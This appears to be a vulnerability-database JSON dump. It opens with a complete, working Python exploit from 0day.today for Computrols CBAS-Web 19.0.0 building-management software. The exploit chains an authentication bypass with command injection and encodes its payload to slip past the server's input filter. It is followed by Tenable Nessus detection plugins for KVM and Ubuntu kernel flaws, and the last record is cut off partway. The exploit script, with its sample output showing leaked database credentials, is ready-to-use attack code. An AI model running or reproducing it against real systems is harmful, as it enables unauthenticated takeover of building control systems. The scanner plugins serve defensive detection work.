{"zdt": [{"lastseen": "2019-12-04T02:04:53", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2019-11-12T00:00:00", "published": "2019-11-12T00:00:00", "id": "1337DAY-ID-33501", "href": "https://0day.today/exploit/description/33501", "title": "CBAS-Web 19.0.0 - Remote Code Execution Exploit", "type": "zdt", "sourceData": "# Exploit Title: CBAS-Web 19.0.0 - Remote Code Execution\r\n# Exploit Author: LiquidWorm\r\n# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/\r\n# Software Link: https://www.computrols.com/building-automation-software/\r\n# Version: 19.0.0\r\n# Tested on: NA\r\n# CVE : N/A\r\n# Advisory: https://applied-risk.com/resources/ar-2019-009\r\n# Paper: https://applied-risk.com/resources/i-own-your-building-management-system\r\n\r\n#!/usr/bin/env python\r\n\r\n'''\r\n Computrols CBAS-Web Unauthenticated Remote Command Injection Exploit\r\n Affected versions: 19.0.0 and below\r\n by Sipke Mellema, 2019\r\n\r\n\r\n Uses two vulnerabilities for executing commands:\r\n - An authorization bypass in the auth module (CVE-2019-10853)\r\n - A code execution vulnerability in the json.php endpoint (CVE-2019-10854)\r\n \r\n Example usage: \r\n $ python CBASWeb_19_rce.py 192.168.1.250 \"cat /var/www/cbas-19.0.0/includes/db.php\"\r\n ------------==[CBAS Web v19 Remote Command Injection\r\n\r\n [*] URL: http://192.168.1.250/\r\n [*] Executing: cat /var/www/cbas-19.0.0/includes/db.php\r\n [*] Cookie is authenticated\r\n [*] Creating Python payload..\r\n [*] Sending Python payload..\r\n [*] Server says:\r\n <?php\r\n // Base functions for database access\r\n // Expects a number of constants to be set. Set settings.php\r\n\r\n // Only allow local access to the database for security purposes\r\n if(defined('WINDOWS') && WINDOWS){\r\n define('MYSQL_HOST', '192.168.1.2');\r\n define('DB_USER', 'wauser');\r\n define('DB_PASS', 'wapwstandard');\r\n /*define('DB_USER', 'root');\r\n define('DB_PASS', 'souper secrit');*/\r\n ...\r\n\r\n'''\r\n\r\nimport requests\r\nimport sys\r\nimport base64 as b\r\nimport json\r\n\r\n\r\ndef debug_print(msg, level=0):\r\n if level == 0:\r\n print \"[*] %s\" % msg\r\n if level == 1:\r\n print \"[-] %s\" % msg\r\n\r\n# Check parameters\r\nif len(sys.argv) < 3:\r\n print \"Missing target parameter\\n\\n\\tUsage: %s <IP or hostname> \\\"<cmd>\\\"\" % __file__\r\n exit(0)\r\n\r\nprint \"------------==[CBAS Web v18 Remote Command Injection\\n\"\r\n\r\n# Set host, cookie and URL\r\nhost = sys.argv[1]\r\ncookies = {'PHPSESSID': 'comparemetoasummersday'}\r\nurl = \"http://%s/\" % host\r\n\r\ndebug_print(\"URL: %s\" % url)\r\n\r\n# Command to execute\r\n# Only use single quotes in cmd pls\r\nicmd = sys.argv[2]\r\nif '\"' in icmd:\r\n debug_print(\"Please don't use double quotes in your command string\", level = 1)\r\n exit(0)\r\n\r\ndebug_print(\"Executing: %s\" % icmd)\r\n\r\n# URL for performing auth bypass by setting the auth cookie flag to true\r\nauth_bypass_req = \"cbas/index.php?m=auth&a=agg_post&code=test\"\r\n# URL for removing auth flag from cookie (for clean-up)\r\nlogout_sess_req = \"cbas/index.php?m=auth&a=logout\"\r\n# URL for command injection and session validity checking\r\njson_checks_req = \"cbas/json.php\"\r\n\r\n# Perform logout\r\ndef do_logout():\r\n requests.get(url + logout_sess_req, cookies = cookies)\r\n\r\n# Check if out cookie has the authentication flag\r\ndef has_auth():\r\n ret = requests.get(url + json_checks_req, cookies = cookies)\r\n if ret.text == \"Access Forbidden\":\r\n return False\r\n return True\r\n\r\n# Set auth flag on cookie\r\ndef set_auth():\r\n requests.get(url + auth_bypass_req, cookies = cookies)\r\n\r\n# =======================================================\r\n\r\n# Perform auth bypass if not authenticated yet\r\nif not has_auth():\r\n debug_print(\"Cookie not yet authenticated\")\r\n debug_print(\"Setting auth flag on cookie via auth bypass..\")\r\n set_auth()\r\n\r\n# Check if bypass failed\r\nif not has_auth():\r\n debug_print(\"Was not able to perform authorization bypass :(\")\r\n debug_print(\"Exploit failed, quitting..\", level = 1)\r\n exit(0)\r\n\r\nelse:\r\n debug_print(\"Cookie is authenticated\")\r\n debug_print(\"Creating Python payload..\")\r\n\r\n # Payload has to be encoded because the server uses the following filtering in exectools.php:\r\n # $bad = array(\"..\", \"\\\\\", \"&\", \"|\", \";\", '/', '>', '<');\r\n # So no slashes, etc. This means only two \"'layers' of quotes\"\r\n \r\n # Create python code exec code\r\n cmd_python = 'import os; os.system(\"%s\")' % icmd\r\n # Convert to Python array\r\n cmd_array_string = str([ord(x) for x in cmd_python])\r\n # Create command injection string\r\n p_unencoded = \"DispatchHistoryQuery\\t-i \\\"$(python -c 'exec(chr(0)[0:0].join([chr(x) for x in %s]))')\\\"\" % cmd_array_string\r\n # Base64 encode for p parameter\r\n p_encoded = b.b64encode(p_unencoded)\r\n\r\n # Execute command\r\n debug_print(\"Sending Python payload..\")\r\n ret = requests.post(url + json_checks_req, cookies = cookies, data = {'p': p_encoded})\r\n\r\n # Parse result\r\n ret_parsed = json.loads(ret.text)\r\n try:\r\n metadata = ret_parsed[\"metadata\"]\r\n identifier = metadata[\"identifier\"]\r\n\r\n debug_print(\"Server says:\")\r\n print identifier\r\n\r\n # JSON Parsing error\r\n except:\r\n debug_print(\"Error parsing result from server :(\", level = 1)\r\n\r\n# Uncomment if you want the cookie to be removed after use\r\n# debug_print(\"Logging out\")\r\n# do_logout()\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33501"}], "nessus": [{"lastseen": "2019-11-01T02:06:28", "bulletinFamily": "scanner", "description": "According to the versions of the kvm package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The msr_mtrr_valid function in arch/x86/kvm/mtrr.c in\n the Linux kernel before 4.6.1 supports MSR 0x2f8, which\n allows guest OS users to read or write to the\n kvm_arch_vcpu data structure, and consequently obtain\n sensitive information or cause a denial of service\n (system crash), via a crafted ioctl\n call.(CVE-2016-3713)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support is vulnerable to a null\n pointer dereference flaw. It could occur on x86\n platform, when emulating an undefined instruction. An\n attacker could use this flaw to crash the host kernel\n resulting in DoS.(CVE-2016-8630)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support was vulnerable to an\n incorrect segment selector(SS) value error. The error\n could occur while loading values into the SS register\n in long mode. A user or process inside a guest could\n use this flaw to crash the guest, resulting in DoS or\n potentially escalate their privileges inside the\n guest.(CVE-2017-2583)\n\n - arch/x86/kvm/emulate.c in the Linux kernel through\n 4.9.3 allows local users to obtain sensitive\n information from kernel memory or cause a denial of\n service (use-after-free) via a crafted application that\n leverages instruction emulation for fxrstor, fxsave,\n sgdt, and sidt.(CVE-2017-2584)\n\n - A reachable assertion failure flaw was found in the\n Linux kernel built with KVM virtualisation(CONFIG_KVM)\n support with Virtual Function I/O feature (CONFIG_VFIO)\n enabled. This failure could occur if a malicious guest\n device sent a virtual interrupt (guest IRQ) with a\n larger (>1024) index value.(CVE-2017-1000252)\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of instructions (a commonly used performance\n optimization). There are three primary variants of the\n issue which differ in the way the speculative execution\n can be exploited. Variant CVE-2017-5715 triggers the\n speculative execution by utilizing branch target\n injection. It relies on the presence of a\n precisely-defined instruction sequence in the\n privileged code as well as the fact that memory\n accesses may cause allocation into the microprocessor", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1450.NASL", "href": "https://www.tenable.com/plugins/nessus/124953", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : kvm (EulerOS-SA-2019-1450)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124953);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/11 12:05:35\");\n\n script_cve_id(\n \"CVE-2016-3713\",\n \"CVE-2016-8630\",\n \"CVE-2017-1000252\",\n \"CVE-2017-17741\",\n \"CVE-2017-2583\",\n \"CVE-2017-2584\",\n \"CVE-2017-5715\",\n \"CVE-2017-7518\",\n \"CVE-2018-10853\",\n \"CVE-2018-3639\",\n \"CVE-2019-6974\",\n \"CVE-2019-7221\",\n \"CVE-2019-7222\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kvm (EulerOS-SA-2019-1450)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kvm package installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The msr_mtrr_valid function in arch/x86/kvm/mtrr.c in\n the Linux kernel before 4.6.1 supports MSR 0x2f8, which\n allows guest OS users to read or write to the\n kvm_arch_vcpu data structure, and consequently obtain\n sensitive information or cause a denial of service\n (system crash), via a crafted ioctl\n call.(CVE-2016-3713)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support is vulnerable to a null\n pointer dereference flaw. It could occur on x86\n platform, when emulating an undefined instruction. An\n attacker could use this flaw to crash the host kernel\n resulting in DoS.(CVE-2016-8630)\n\n - Linux kernel built with the Kernel-based Virtual\n Machine (CONFIG_KVM) support was vulnerable to an\n incorrect segment selector(SS) value error. The error\n could occur while loading values into the SS register\n in long mode. A user or process inside a guest could\n use this flaw to crash the guest, resulting in DoS or\n potentially escalate their privileges inside the\n guest.(CVE-2017-2583)\n\n - arch/x86/kvm/emulate.c in the Linux kernel through\n 4.9.3 allows local users to obtain sensitive\n information from kernel memory or cause a denial of\n service (use-after-free) via a crafted application that\n leverages instruction emulation for fxrstor, fxsave,\n sgdt, and sidt.(CVE-2017-2584)\n\n - A reachable assertion failure flaw was found in the\n Linux kernel built with KVM virtualisation(CONFIG_KVM)\n support with Virtual Function I/O feature (CONFIG_VFIO)\n enabled. This failure could occur if a malicious guest\n device sent a virtual interrupt (guest IRQ) with a\n larger (>1024) index value.(CVE-2017-1000252)\n\n - An industry-wide issue was found in the way many modern\n microprocessor designs have implemented speculative\n execution of instructions (a commonly used performance\n optimization). There are three primary variants of the\n issue which differ in the way the speculative execution\n can be exploited. Variant CVE-2017-5715 triggers the\n speculative execution by utilizing branch target\n injection. It relies on the presence of a\n precisely-defined instruction sequence in the\n privileged code as well as the fact that memory\n accesses may cause allocation into the microprocessor's\n data cache even for speculatively executed instructions\n that never actually commit (retire). As a result, an\n unprivileged attacker could use this flaw to cross the\n syscall and guest/host boundaries and read privileged\n memory by conducting targeted cache side-channel\n attacks.(CVE-2017-5715)\n\n - A flaw was found in the way the Linux KVM module\n processed the trap flag(TF) bit in EFLAGS during\n emulation of the syscall instruction, which leads to a\n debug exception(#DB) being raised in the guest stack. A\n user/process inside a guest could use this flaw to\n potentially escalate their privileges inside the guest.\n Linux guests are not affected by this.(CVE-2017-7518)\n\n - Linux kernel compiled with the KVM virtualization\n (CONFIG_KVM) support is vulnerable to an out-of-bounds\n read access issue. It could occur when emulating vmcall\n instructions invoked by a guest. A guest user/process\n could use this flaw to disclose kernel memory\n bytes.(CVE-2017-17741)\n\n - Systems with microprocessors utilizing speculative\n execution and speculative execution of memory reads\n before the addresses of all prior memory writes are\n known may allow unauthorized disclosure of information\n to an attacker with local user access via a\n side-channel analysis, aka Speculative Store Bypass\n (SSB), Variant 4.(CVE-2018-3639)\n\n - kernel: kvm: guest userspace to guest kernel\n write(CVE-2018-10853)\n\n - In the Linux kernel before 4.20.8,\n kvm_ioctl_create_device in virt/kvm/kvm_main.c\n mishandles reference counting because of a race\n condition, leading to a use-after-free.(CVE-2019-6974)\n\n - The KVM implementation in the Linux kernel through\n 4.20.5 has an Information Leak.(CVE-2019-7222)\n\n - The KVM implementation in the Linux kernel through\n 4.20.5 has a Use-after-Free.(CVE-2019-7221)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1450\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3d6cefe5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kvm packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kvm-4.4.11-30.011\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kvm\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:34:33", "bulletinFamily": "scanner", "description": "Jann Horn discovered that the vmacache subsystem did not properly\nhandle sequence number overflows, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the\nLinux kernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A\nlocal attacker could use this to expose sensitive information.\n(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution\nand prediction of return addresses via Return Stack Buffer (RSB) may\nallow unauthorized memory reads via sidechannel attacks. An attacker\ncould use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttila discovered that the KVM\nimplementation in the Linux kernel did not properly check privilege\nlevels when emulating some instructions. An unprivileged attacker in a\nguest VM could use this to escalate privileges within the guest.\n(CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the\niSCSI target implementation of the Linux kernel. A remote attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIRDA implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-6555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-3777-1.NASL", "href": "https://www.tenable.com/plugins/nessus/117872", "published": "2018-10-02T00:00:00", "title": "Ubuntu 18.04 LTS : linux, linux-aws, linux-gcp, linux-kvm, linux-oem, linux-raspi2 vulnerabilities (USN-3777-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3777-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117872);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2018-10853\", \"CVE-2018-14633\", \"CVE-2018-15572\", \"CVE-2018-15594\", \"CVE-2018-17182\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n script_xref(name:\"USN\", value:\"3777-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS : linux, linux-aws, linux-gcp, linux-kvm, linux-oem, linux-raspi2 vulnerabilities (USN-3777-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jann Horn discovered that the vmacache subsystem did not properly\nhandle sequence number overflows, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the\nLinux kernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A\nlocal attacker could use this to expose sensitive information.\n(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution\nand prediction of return addresses via Return Stack Buffer (RSB) may\nallow unauthorized memory reads via sidechannel attacks. An attacker\ncould use this to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttila discovered that the KVM\nimplementation in the Linux kernel did not properly check privilege\nlevels when emulating some instructions. An unprivileged attacker in a\nguest VM could use this to escalate privileges within the guest.\n(CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the\niSCSI target implementation of the Linux kernel. A remote attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the\nIRDA implementation in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2018-6555).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3777-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-10853\", \"CVE-2018-14633\", \"CVE-2018-15572\", \"CVE-2018-15594\", \"CVE-2018-17182\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3777-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1021-gcp\", pkgver:\"4.15.0-1021.22\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1021-oem\", pkgver:\"4.15.0-1021.24\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1023-aws\", pkgver:\"4.15.0-1023.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1023-kvm\", pkgver:\"4.15.0-1023.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-1024-raspi2\", pkgver:\"4.15.0-1024.26\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-36-generic\", pkgver:\"4.15.0-36.39\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-36-generic-lpae\", pkgver:\"4.15.0-36.39\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-36-lowlatency\", pkgver:\"4.15.0-36.39\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-4.15.0-36-snapdragon\", pkgver:\"4.15.0-36.39\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-aws\", pkgver:\"4.15.0.1023.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gcp\", pkgver:\"4.15.0.1021.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic\", pkgver:\"4.15.0.36.38\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.15.0.36.38\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-gke\", pkgver:\"4.15.0.1021.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.15.0.1023.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.15.0.36.38\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-oem\", pkgver:\"4.15.0.1021.23\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.15.0.1024.22\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.15.0.36.38\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.15-aws / linux-image-4.15-gcp / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-11-03T12:34:46", "bulletinFamily": "scanner", "description": "USN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu\n16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly\nhandle sequence number overflows, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of\nservice (system crash) or execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the\nLinux kernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A\nlocal attacker could use this to expose sensitive information.\n(CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution\nand prediction of return addresses via Return Stack Buffer (RSB) may\nallow unauthorized memory reads via sidechannel attacks. An attacker\ncould use this to expose sensitive information. 